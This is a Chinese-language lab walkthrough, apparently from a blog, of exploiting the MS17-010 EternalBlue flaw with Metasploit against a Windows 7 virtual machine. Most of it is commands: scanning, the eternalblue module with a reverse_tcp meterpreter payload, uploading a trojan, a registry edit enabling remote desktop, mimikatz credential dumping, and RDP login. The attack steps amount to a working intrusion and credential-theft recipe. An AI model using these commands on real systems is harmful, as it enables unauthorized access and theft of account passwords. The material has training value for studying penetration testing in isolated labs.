MSF之ms17-010永恒之蓝漏洞利用

MSF之ms17-010永恒之蓝漏洞利用

  • 准备
  • 扫描漏洞
  • 漏洞攻击

准备

实验准备环境:
被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)
攻击机:虚拟机kali系统,其IP为:192.168.207.130
攻击工具:kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)
msf >set RHOSTS 10.101.2.11(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)

MSF之ms17-010永恒之蓝漏洞利用_第1张图片

由上图可知,存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)
set RHOST 10.101.2.11(被攻击机IP)
set LHOST 192.168.207.130(设置本地IP)
set LPORT 4444(设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

MSF之ms17-010永恒之蓝漏洞利用_第2张图片

show options(查看配置相关信息)
MSF之ms17-010永恒之蓝漏洞利用_第3张图片
MSF之ms17-010永恒之蓝漏洞利用_第4张图片

meterpreter >exploit(开始攻击)
MSF之ms17-010永恒之蓝漏洞利用_第5张图片
攻击成功!

sysinfo爆出系统信息
screenshot截屏,截屏后的图片存放在/root/中

meterpreter >shell,进入靶机cmd
MSF之ms17-010永恒之蓝漏洞利用_第6张图片
此时,可以新建文件夹,然后
meterpreter >upload植入已经写好的木马!<此中方法,以后再做>

也可以通过使用msf中的mimikatz,来爆出靶机的用户名和密码,以下是其过程:
首先

netstat -an< 查靶机端口开发情况>
MSF之ms17-010永恒之蓝漏洞利用_第7张图片

如果没有开启3389端口,可以使用以下命令再cmd中开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz
meterpreter > help
MSF之ms17-010永恒之蓝漏洞利用_第8张图片

meterpreter > msv <获取的是hash值>
MSF之ms17-010永恒之蓝漏洞利用_第9张图片

meterpreter > ssp <获取的是明文信息>
MSF之ms17-010永恒之蓝漏洞利用_第10张图片

meterpreter > wdigest <读取内存中存放的账号密码明文信息>
MSF之ms17-010永恒之蓝漏洞利用_第11张图片

meterpreter > kerberos <同widgest类似,我也没有弄清楚,如果大佬知道,还望指点>
MSF之ms17-010永恒之蓝漏洞利用_第12张图片

接下来,就是远程登录靶机

rdesktop 10.101.2.11

MSF之ms17-010永恒之蓝漏洞利用_第13张图片

成功!

你可能感兴趣的:(渗透)